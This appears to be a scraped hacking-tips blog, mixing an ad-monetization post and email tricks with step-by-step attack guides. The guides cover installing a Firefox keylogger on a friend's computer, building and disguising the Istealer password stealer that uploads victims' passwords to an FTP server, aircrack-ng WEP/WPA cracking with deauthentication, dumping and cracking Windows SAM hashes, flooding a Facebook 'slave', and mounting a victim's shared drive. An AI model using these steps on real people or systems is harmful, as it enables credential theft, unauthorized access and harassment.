Earn Money from In-Text Advertising on Your Website with Infolinks

Are you looking for monatization opportunities for your blog or website? Most of bloggers and webmasters looking for monetization opportunities to earn extra income via published content. As their site's user engagement grows, they will find monatization as a hidden opportunity to jump more few steps ahead. When it comes to monatization, you will find various kind of options if you google it. Once we hear about monetization, our mind will cross with banner advertisements on a website. That's how we define an advertisement on web space. But would you like to display ads without reserving any space on your website?

There is nothing to wonder about. Infolinks is a provider of pay-per-click ads for websites and their approach is not the way that other advertisers do. Infolinks offer advertisements for your text or content already available on your website. It's called as In-Text advertising where it detects suitable keywords in your content and match them with available ads. Also their dynamic proprietary algorithm is capable of maintaining relevancy of ads with your site content. So once a match found, Infolinks will integrate ads with your text and it will be activated when a user hover over the text as a pop up bubble. As it doesn't cost you  extra space on your website, you can use it with other monetization alternatives too.

As it incorporate with your text, you will be say BIG "NO" for Infolinks if you are much considered about your search engine rankings and optimizations. But having the Infolinks In-Text ads on your website will not interfere with your SEO as the Infolink script based on Java Script where search engines can't crawl these ads on your site. But it could be cautious, if your visitors start to believe your in-line text are spammy kind of things. Therefore you better mention about Infolinks on your website and control the amount of links displayed within a page.

Infolinks do not impose restrictions or requirements on publishers for integrating on websites. However your application will be reviewed to find if there is any illegal or offensive activities happen on your website. Infolinks let you customize its functionality to optimize In-Text ads with your website. The links will start to appear right after you integrated the Infolinks script. It offer you popular payment methods such as PayPal, Bank Wire, E-Check and ACH with certain threshold or payout limits. However overally, Infolinks is a useful monetization option with moderate to high payout rate if you generate quality and enough content on your blog or website.

Steps:

1. Sign up for a new Infolinks publisher account.

Note: Once you signed up for a new account, you will have to wait until Infolinks team review your application. After the review, you will get confirmation email to access your account.

2. Now sign in to your account.

3. Navigate to My Websites page.

4. Now access customization options by clicking on customize icon and Save changes after the customization. There you can change,

- Appearance of In-text advertising links

- Number of links per page

- Category of your content

Note: You can see a preview of your changes in example box.

5. Now set up your Payment Details to receive payments.

6. Navigate to Integration page.

7. Select your website unless it has already selected and copy the script code for your website.

8. Now go and add Infolinks script code to your website right before the </body> tag in your template.

* You can control Infolinks In-Text ads and enable In-Text ads only for your preferred area on the website. You just need to enclose your preferred content area which you wanna show ads, by <!--INFOLINKS_ON--> and <!--INFOLINKS_OFF--> tags as below,

<!--INFOLINKS_ON-->

[This is my content area where Infolinks In-Text ads will be displayed. Content not enclosed by these tags won't eligible for In-Text ads.]

<!--INFOLINKS_OFF-->

More Information:

* You can configure extra Infolinks widgets to increase your revenue even more. Configure Related Tags, Tag Cloud and Search Widget of your choice.

* You can view how your readers engage with Infolinks In-Text advertisements via Infolinks Reports.

Read More

xenotix keylogx keylogger for Firefox

Mostly all are using Firefox as a default browser and so I am going to give you one of the best tool (add-on) for the Firefox ...
If you want password of your friends or any other then just install this add-on on his/her computer/laptop it is possible only if you have a physical access...
so lets start...

1. open Firefox (Internet is required).
2. go to tools menu and click on add-on or by just simply clicking Ctrl+Shift+A.
3. find "xenotix keylogx" key-logger.
4. after downloading it, install it.
5. restart Firefox.
6. press Alt+x
7. and set password.
8. finish...
9. when you get physical access of that computer/laptop just press Alt+x and enter your password.
10. one log file will open and in that log file all keys are written which was pressed by your friends in the Firefox...
11. finish 
12. so by this way you can get all the password and all the things...

Hope Its Cool One......

Read More

Istealer 4.0

Istealer can be used to hack email account password and find passwords of various emails.

Istealer Password stealer - hack email passwords:

1. Download Istealer password stealer software to hack email account password.
2. Unzip the downloaded windows password stealer.
3. Go to http://www.esmartstart.com/ and sign up for free account. After creating free ftp server account, enable FTP Access and create a new folder named "Istealer" at your FTP.
4. Run the Loader.exe file present in Istealer folder to get something like:
5. Istealer windows password stealer
6. Now, simply fill the following in Istealer:
7.  Host: ftpserver.esmartdesign.com
8.  Username and Password: Your username and password for esmartstart ftp server.
9. Directory: /Istealer.
10. You can bind Istealer to any other file by checking "Bind with another file" and giving file path to bind with. Also, you can use Icon Change to change Istealer file icon. This step is optional but, necessary for hiding password stealer from victim's eyes. You can bind password stealer file with fake error message.
11. To check whether you have entered right ftp server information, hit "Test" and if you have done it right, you will get message "Works perfect". If it says "Cannot connect to FTP Server", you have entered something wrong... just check it again.
12. When you've done all above steps, simply hit on "Build" and save the password stealer file as you want. You can also use Crypter to avoid antivirus detection.
13. Now, simply send this password stealer file to victim and make him run this windows password stealer file on his computer(Social Engineering). After he runs our sent password stealer file on his computer, you will get all passwords and records saved on his computer at your FTP server.

That's it. Thus, you can hack email account password using Istealer- the windows password stealer software. Remember to crypt and then bind this windows Password stealer to make it undetectable by antivirus. If you have any problem in using this Istealer password stealer software to hack email account password, please mention it in comments.

Enjoy Istealer to hack email account password...

Read More

Ettercap (Tool for sniffing gmail, yahoo, paypal, etc. passwords)

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
 It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.
 Ettercap is a Unix and Windows tool for computer network protocol analysis and security auditing.

 It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.

It is free open source software, licensed under the terms of the GNU General Public License.

Ettercap offers four modes of operation:

1.  IP-based: packets are filtered based on IP source and destination.
2. MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway.
3. ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex).
4. PublicARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex).

In addition, the software also offers the following features:

1.  Character injection into an established connection. Ettercap is the first software capable of sniffing an SSH connection in full duplex.
2. HTTPS support: the sniffing of HTTP SSL secured data--even when the connection is made through a proxy.
3. Remote traffic through a GRE tunnel: the sniffing of remote traffic through a GRE tunnel from a remote Cisco router, and perform a man-in-the-middle attack on it.
4. Plug-in support: creation of custom plugins using Ettercap's API.
5. Password collectors for: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG
6. Packet filtering/dropping: setting up a filter that searches for a particular string (or hexadecimal sequence) in the TCP or UDP payload and replaces it with a custom string/sequence of choice, or drops the entire packet.
7. OS fingerprinting: determine the OS of the victim host and its network adapter.
8. Kill a connection: killing connections of choice from the connections-list.
9. Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.
10. Hijacking of DNS requests.
11. Ettercap also has the ability to actively or passively find other poisoners on the LAN.

Very interesting.. Isn't it? But don't forget that this will work only if the victim is on the same LAN as you are.
Ettercap official website: http://ettercap.sourceforge.net/ 

Ettercap download page: http://ettercap.sourceforge.net/download.php
We recommend Linux to get the best out of Ettercap.

Read More

Now Watch Indian TV Shows On Youtube

Back in 2009, Youtube launched a new ‘Television Shows’ section where anyone could watch full length TV shows for free. At the time it was launched, the service was first made available only to US citizens and then it gradually rolled out to other parts of the world. Indian TV viewers, you’ll be happy to know that the ‘Television Shows’ section is now accessible in India where you can watch Indian TV serials with full length episodes for free right on the Youtube website.

Read More

I.P. Utilities

The following are the IP utilities available in Windows that help in finding out the information about IP Hosts and domains.These are the basic IP Hacking Commands that everyone must know!

NOTE: The term Host used in this article can also be assumed as a Website for simple understanding purpose.

1. PING

PING is a simple application (command) used to determine whether a host is online and available.PING command sends one or more ICMP Echo messages to a specified host requesting a reply.The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender.This confirms that the Host is online and available.Otherwise the host is said to be unavailable.

Syntax:
C:\>ping hnk007.co.cc
The following image shows the ping command which pings the host hnk007.co.cc



2. TELNET
Telnet command is used to connect to a desired host on a specified port number.For example
Syntax:
C:\>telnet yahoo.com 25
C:\>telnet yahoo.com


3. NSLOOKUP
Many times we think about finding out the IP address of a given site.Say for example google.com,yahoo.com,microsoft.com etc.But how to do this? For this there are some websites that can be used to find out the IP address of a given site.But in Windows we have an inbuilt tool to do this job for us.It is nslookup.Yes this tool can be used for resolving a given domain name into it's IP address (determine the IP of a given site name).Not only this it can also be used for reverse IP lookup.That is if the IP address is given it determines the corresponding domain name for that IP address.

Syntax:
C:\>nslookup google.com

The following images shows the usage of nslookup command.

4. NETSTAT
The netstat command can be used to display the current TCP/IP network connections.For example the following netstat command displays all connections and their corresponding listening port numbers.
Eg: C:\>netstat -a
This command can be used to determine the IP address/Host names of all the applications connected to your computer.If a hacker is connected to your system even the hacker's IP is displayed.So the netstat command can be used to get an idea of all the active connections to a given system.

Read More

Metasploit Framework : Hack the Planet

Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.




Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7.

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third party security researchers to investigate potential vulnerabilities. On October 21st, 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity's CANVAS or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.

Metasploit's emerging position as the de facto vulnerability development framework has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug. Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities in the first instance, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November, 2006.

Metasploit Official Website: http://www.metasploit.com/
Metasploit download page: http://www.metasploit.com/framework/download/

Read More

Nessus: Premier vulnerability assessment tool

In computer security, Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:

• Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
• Misconfiguration (e.g. open mail relay, missing patches, etc).
• Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
• Denials of service against the TCP/IP stack by using mangled packets
  

On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system.

According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey^. Tenable estimates that it is used by over 75,000 organizations worldwide.

In typical operation, Nessus begins by doing a port scan with one of its four internal portscanners (or it can optionally use Amap or Nmap ) to determine which ports are open on the target and then tries various exploits on the open ports. The vulnerability tests, available as subscriptions, are written in NASL (Nessus Attack Scripting Language), a scripting language optimized for custom network interaction.

Tenable Network Security produces several dozen new vulnerability checks (called plugins) each week, usually on a daily basis. These checks are available for free to the general public; commercial customers are not allowed to use this Home Feed any more. The Professional Feed (which is not free) also give access to support and additional scripts (audit and compliance tests...).

Optionally, the results of the scan can be reported in various formats, such as plain text, XML, HTML and LaTeX. The results can also be saved in a knowledge base for debugging. On UNIX, scanning can be automated through the use of a command-line client. There exist many different commercial, free and open source tools for both UNIX and Windows to manage individual or distributed Nessus scanners.

If the user chooses to do so (by disabling the option 'safe checks'), some of Nessus's vulnerability tests may try to cause vulnerable services or operating systems to crash. This lets a user test the resistance of a device before putting it in production.

Nessus provides additional functionality beyond testing for known network vulnerabilities. For instance, it can use Windows credentials to examine patch levels on computers running the Windows operating system, and can perform password auditing using dictionary and brute force methods. Nessus 3 and later can also audit systems to make sure they have been configured per a specific policy, such as the NSA's guide for hardening Windows servers.

Nessus official website : http://www.nessus.org/nessus/

Download Link: http://www.nessus.org/download/

Read More

Crack WEP, WPA-2 and WPA-PSK Wi-Fi Network key

We assume that if you have reached here to read this post, then supposedly you atleast know that to hack a wireless network you atleast need a wireless card installed machine, preferably a lappy which can be carried easily.

Step 1: airmon-ng

Please download Backtrack 4 from HERE

airmon-ng stop wlan0
iwconfig (to find all wireless network interfaces and their status)
airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

Note: You can use the su command to switch to a root account.




Step 2: airodump-ng

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

airodump-ng mon0 - monitors all channels, listing available access points and associated clients within range. It is best to select a target network with strong signal (PWR column), more traffic (Beacons/Data columns) and associated clients (listed below all access points). Once you've selected a target, note its Channel and BSSID (MAC address). Also note any STATION associated with the same BSSID (client MAC addresses).

Step 3: airodump-ng (Capture data)

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels. Assuming our wireless card is mon0, and we want to capture packets on channel 6 into a text file called data:

airodump-ng -c 6 bssid 00:0F:CC:7D:5A:74 -w data mon0 (-c 6 switch would capture data on channel 6, bssid 00:0F:CC:7D:5A:74 is the MAC address of our target access point, -w data specifies that we want to save captured packets into a file called "data" in the current directory, mon0 is our wireless network adapter)

You typically need between 20,000 and 40,000 data packets to successfully recover a WEP key.

Step 4: aireplay-ng (Increase Traffic)

An active network can usually be penetrated within a few minutes. However, slow networks can take hours, even days to collect enough data for recovering the WEP key.

This optional step allows a compatible network interface to inject/generate packets to increase traffic on the wireless network, therefore greatly reducing the time required for capturing data. The aireplay-ng command should be executed in a separate terminal window, concurrent to airodump-ng. It requires a compatible network card and driver that allows for injection mode.

Assuming your network card is capable of injecting packets, in a separate terminal window try:

aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0
-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface

Step 5: aircrack-ng (Crack WEP)

WEP cracking is a simple process, only requiring collection of enough data to then extract the key and connect to the network. You can crack the WEP key while capturing data. In fact, aircrack-ng will re-attempt cracking the key after every 5000 packets.

To attempt recovering the WEP key, in a new terminal window, type:

aircrack-ng data*.cap (assuming your capture file is called data...cap, and is located in the same directory)
.

Step 6: aircrack-ng

WPA, unlike WEP rotates the network key on a per-packet basis, rendering the WEP method of penetration useless. Cracking a WPA-PSK/WPA2-PSK key requires a dictionary attack on a handshake between an access point and a client. What this means is, you need to wait until a wireless client associates with the network (or deassociate an already connected client so they automatically reconnect). All that needs to be captured is the initial "four-way-handshake" association between the access point and a client. WPA hashes the network key using the wireless access point's SSID as salt. This prevents the statistical key-grabbing techniques that broke WEP, and makes hash precomputation more dificult because the specific SSID needs to be added as salt for the hash.

With all that said, the weakness of WPA-PSK comes down to the passphrase. A short/weak passphrase makes it vulnerable to dictionary attacks.

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. This can be obtained using the same technique as with WEP in step 3 above, using airodump-ng.

You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client (where MAC_IP is the MAC address of the access point, and MAC_Client is the MAC address of an associated client).

Once you have captured a four-way handshake, you also need a large/relevant dictinary file with common passphrases. See related links below for some wordlist links.

You can, then execute the following command in a linux terminal window (assuming both the dictionary file and captured data file are in the same directory):

aircrack-ng -w dictionary_file capture_file

Notes:
Cracking WPA-PSK and WPA2-PSK may take much longer, and will only succeed with weak passphrases and good dictionary files.

Alternatively, there are tools like coWPAtty that can use precomputed hash files to speed up dictionary attacks. Those hash files can be very effective, but quite big in size. The Church of WiFi has computed hash tables for the 1000 most common SSIDs against a million common passphrases that are 7Gb and 33Gb in size...

Read More

How to detect unknown open ports and their associated applications using FPORT V2.0

The first step in hacking attack is information gathering and foot printing.It involves searching for victims open ports.To do this various application are available on Internet.But what can we do to stop/prevent hacker from knowing which ports of our system are open.Here is  Fport comes into picture.
 fport reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications.




Usage:

C:\>fport

Pid Process Port Proto Path
392 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
8 System -> 139 TCP
8 System -> 445 TCP
508 MSTask -> 1025 TCP C:\WINNT\system32\MSTask.exe
392 svchost -> 135 UDP C:\WINNT\system32\svchost.exe
8 System -> 137 UDP
8 System -> 138 UDP
8 System -> 445 UDP
224 lsass -> 500 UDP C:\WINNT\system32\lsass.exe
212 services -> 1026 UDP C:\WINNT\system32\services.exe

The program contains five (5) switches. The switches may be utilized using either a '/'
or a '-' preceding the switch. The switches are;

Usage:
/? usage help
/p sort by port
/a sort by application
/i sort by pid
/ap sort by application path

Read More

Rainbow Crack : The Time-Memory Tradeoff Hash Cracker : Crack Windows passwords

Before going ahead with the discussion let us first explain to you why it is so difficult to crack windows passwords.

Windows uses NTLM, LM or MD5 algorithm to encrypt the plain text passwords and saves it in system32/config folder. The encrypted passes that are saved in the SAM file under system32/config are called hashes. Now dont just browse the SAM file and attempt opening it. It's useless doing this under windows. Even if you get to open this file using another OS eg. a live linux distro, you need the keyhive, coz the SAM file is further encrypted with it's key in the 'system' under the same dir as SAM.

The algorithms NTLM, LM or MD5 are not proprietary. So the first thing you might think is, WOW!! then just get the hashes apply the reverse algorithm on them and recover the password. But it's not so easy smart ass. Read further.




Common features of NTLM, LM and MD5 algo:
1) The hashes once formed it is computationally infeasible to recover the original string from the cipher. In layman's lang, the algorithm is irreversible.

2) No two strings can ever have the same hashes.

3) A minor change in the string causes a considerable change in the hash. This is known as avalanche effect.

So when you login to your box and enter the password, the password you entered gets encrypted in one of the forms above and then the so formed hashes are compared to the saved hashes and if they match you are allowed into the system. So from this you can know that even your computer is not aware of your real password.

The passes of your email accounts are also stored in the similar fashion. That's the reason when you say you forgot your password, the website resets your password and cant show you your original password coz even they dont know it. Click the link below to read the rest of the post.




So the only way to crack the hashes is using brute-force. This is where rainbow tables come into the scene. Rainbow tables sound fancy but are very simple to understand. Rainbow tables are a collection of strings and their relative pre-compiled hashes. Each of the hash in the rainbow table is checked with the original hash and one which matches has it's corresponding string as the password. Sounds complicated?? Don't worry script kiddies. Hacktivism has already binded all that you need to crack these hashes.

One of the most widely used tools for hash cracking is Rainbow Crack. You can download it from http://project-rainbowcrack.com/ or if you are using backtrack, it is already installed.

Well rainbow crack takes hashes as inputs. So first you have to extract those hashes from the SAM file. Now we assume that you are using BackTrack 4. If you are not, download it and then come back.

In backtrack to make things easy, go to the media where windows is installed, browse to the WINDOWS/System32/config folder and then copy the SAM and system file and place it on the desktop.

Open the terminal and type the following command:

samdump2 SAM system

This will give the following output

Now copy the part which shows all the accounts and their respective hashes and save them in a file, say, hashes.txt
..
Now you can either use rainbowcrack, john the ripper or ophcrack.

To use rainbowcrack you need the appropriate raindow tables. These rainbow tables are very huge, sometimes ranging in GBs. So they are bulky to download. Alternately, you can make your own Rainbow Tables using RTGen (more on this in the next post) but you can consider downloading some light-weight RT until then.

Download RT from
http://www.project-rainbowcrack.com/table.htm

To start cracking place the downloaded RT in /pentest/passwords/rcrack

Syntax for cracking hashes using rcrack. Go to the BackTrack Menu>Privilege Escalation>Password Attacks>Offline Attacks>Rainbow Crack

Now type

./rcrack rainbow-table-name -f hashes.txt

It may take a long time before finding the correct hash and the corresponding pass. So take a nap and come back...


This post may not be up to the mark, but this is how things are. The methodology can get better. You have to figure out ways to allay the steps. If you want to be a hacker, there is no spoon feeding. So only research is the way to successful hacking.

Read More

WiFi Hacking Basics Part 1

If your are reading this you must have used WiFi at-least once or may be you have your own WiFi network at home.WiFi is cool and hacking WiFi is a lot  more interesting. Here i am gonna tell you the basics of Wireless Network and how it is hacked so that you get a grasp of what is going on with your WiFi.

You can try yourself this attacks for this

What will you need ,

• Laptop with Backtrack installed or Backtrack in VW.
• Access Point(AP)
• USB WiFi Adapter Card which support packet injection(I recommend Alpha Card)
• A Smartphone or another laptop with WiFi (as a Victim)

For those who don't know Backtrack,its a Pentest Linux Distro with all tools necessary.Access point can be any SOHO WiFi router.USB WiFi Adapter is for packet injection because normal Laptop WiFi card chip-set don't support Packet Injection.

So lets get started with basics or theory.

Normally your WiFi card sniff all wireless network around it but only accepts packets destined to it if its connected to it at all. AP (Access Point) is broadcasting networks SSIDs all the time. SSID means name given to wireless network.This network can be open or closed.Open network don't require any authentication on the other hand closed network require a shared key to connect to it.

So how to sniff which which network are there?

For this we use a tool in Backtrack called Aircrack-ng suite.To sniff the packets we create a virtual interface called Moniter Mode Interface (mon 0).Mon 0 is created on top wireless interface on your laptop,say wlan 0.

First task would be to create Mon 0.

Go to backtrack open terminal type airmon-ng start wlan0 

now mon0 is created, to verify it type in terminal ifconfig  you will notice mon0 interface and MAC address same as your wifi card.

Now there is another tool we are going to use to see actual packets Wireshark.Next step fire  up Wireshark by typing wireshark & on  terminal.You will see in interface mon0 listed start capture on mon0.

then you will see lots of packets if there is any WiFi connection  in your vicinity,if you don't see  any traffic create a network using your AP and check the SSIDs.

What we learned : How to create mon0 and sniff traffic.

Contd.. part 2

Read More

'Enable Dislike Button' scam on Facebook

Whenever I hated a status message or a shared link on Facebook, I said to myself - "I wish this thing had a dislike button to express my distress".. This must have come to your mind also, specially after disliking some video on YouTube. Well this urge of disliking posts on FB is what hackers are targeting next.. So beware!!! A quick overview of how the hackers get you to click on the link follows:

Following is a screenshot of how the message would be posted on your wall..

Pay close attention to the 'Enable Dislike Button' link besides the 'Comment' in place of the usual share link. The hackers have done so to fool users in believing it to be a Genuine feature added by FB. There is no official dislike button on FB.

Clicking on the link will cause same consequences which you might have experienced with the WTF video or Check who is visiting your profile link. The link will be posted on walls of random friends and the cycle will continue. It is believed that the link contains obfuscated JavaScript which is used by spammers to study browsing behavior.

Another example relating to the Dislike Button:

This link tricks you into pasting a javascript to your browser. *Not at all recommended.

Repeating Again - "FB does not provide a Dislike feature"

Read More

How to Flood Facebook Wallpost/Comment/Message

1) A Facebook Account and a slave (of course)

2) Auto-Clicker (In this tutorial we will use Auto Clicker v2.2 by Shocker)
Download: You can download it at the Official Site : http://www.shockingsoft.com/AutoClicker.html
NOTE: Detections are false positives. If you don't trust me you can run it send boxed.
3) The most important is BRAIN and COMMON SENSE

INSTRUCTIONS:

1) Login to your Facebook account. Then after logging in, open another tab/window then go to "m.facebook.com" (without quotes)

2) Go to friends, then type your slave's name then click Search. Now go to your slave's profile.

3) Now for the third step, I will cut this into 3 parts, Wall post Flood, Comment Flood and Messaging Flood.

-Wall post Flood-

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is except the "Number of Clicks".

2) Put your comment on the text box. Then press F2. NOTE: Don't put your cursor on the "Post" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your task bar.

3) Now after you saw the progress of click at the task bar place your cursor on the "Post" button.

4) Now leave your cursor on the "Post" button while the Auto-Clicker runs. Leave it for at least a minute.

5) Finished. You've just flooded his Wall.

-Comment Flood-

NOTE: In this tutorial we will Comment Flood a profile picture. But you can also use Comment Flooding in Wall posts and other posts/pics/videos that can be commented on. Just use your common sense on how to do it.

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is except the "Number of Clicks".

2) Click your slave's profile picture.

3) Pick a photo you want to comment on. (You can use Next and Previous Button to Navigate to his other Profile Pics.)

4) Put your comment on the text box. Then press F2. NOTE: Don't put your cursor on the "Comment" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your task bar

5) Now after you saw the progress of click at the task bar place your cursor on the "Comment" button.

6) Now leave your cursor on the "Comment" button while the Auto-Clicker runs. Leave it for atleast a minute.

7) Finished. You've just comment flooded a profile picture of your slave 

-Message Flood-

1) Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is exept the "Number of Clicks"

2) Click "Messages" beside his profile picture.

3) Put anything in the "Subject" and "Body Message".

4) Then press F2. NOTE: Don't put your cursor on the "Send" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your task bar.

5) Now after you saw the progress of click at the task bar place your cursor on the "Send" button.

6) Now leave your cursor on the "Send" button while the Auto-Clicker runs. Leave it for at least a minute.

7) Finished! You've just flooded an Inbox of your slave

Read More

Hack Shared Data

Step 1
Get IP using netstat command.

Step2
Open a dos prompt by going to start/run
type "cmd" in the run box.Press OK.
this is what u will see:
C:\Documents and Settings\>

c:windows>nbtstat -a 192.168.92.2

U will see:
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------
If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3
type :
c:windows>net view 192.168.92.2
The Output will be:

Shared resources at 192.168.92.2

Sharename Type Used as Comment

CDISK Disk xxxxx xxxxx
The work is done.
"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4
type down:
replace x: by anything letter you want but not your own drive
letters.(Not compulsory)
CDISK is the name of the shared hard-drive.

c:windows>net use x: 192.168.92.2CDISK

If the command is successful we will get the confirmation.
The command was completed successfully
Now open windows explorer or just double click on the My Computer icon
on your
desktop and you will see a new network drive X:> .
Now your are in his system.


This is only available for local network connection(like in a college,Bank,Office Etc).. And victim must have to shared  data in his PC.
Check out guyz....
Do dis AT your own Risk.....

Read More

Cool E-Mail Address U'll Love To Mail

1. pdf@koolwire.com
     All you need to do is send any file of format among these types Word (doc, docx), Powerpoint (ppt, pptx), Excel (xls, xlsx), Visio (vsd), MS Project (mpp), Jpeg, GIF, RTF, txt to the above email address as an
attachment, shortly you'll receive an email containing the PDF version of the file you sent. Cool! isn't it!

 2. mp3@koolwire.com
     Similar service which accepts a wav file and outputs a mp3 file.

 3. ..@photos.flickr.com
       Flickr provides you an unique email address, which you can get from here (http://www.flickr.com/account/uploadbyemail/), to which when you send your photographs as attachment, they'll appear in your Flickr gallery in a matter of minutes. The subject line of email becomes the photo's title while the body of the email becomes the photo's description.

 4. www@web2mail.com
      Send and email to the above address with the URL you wish to browse in the subject line of the mail.  you'll get an email containing the text version of the URL you just sent, this one's a breather for people
whose offices block all websites, except the company webmail. When I tried the this service last the response time was quite high, I guess that's a temporary problem.

 5. wsmith@wordsmith.org
     Want to know the dictionary meaning or synonyms of a word?? Send a blank email to the above address, just have a similar subject line, "define myword", without the quotes. You'll get what you want.

 I hope that was some interesting piece of information. Do share your views/comments/experience about these new services.

Read More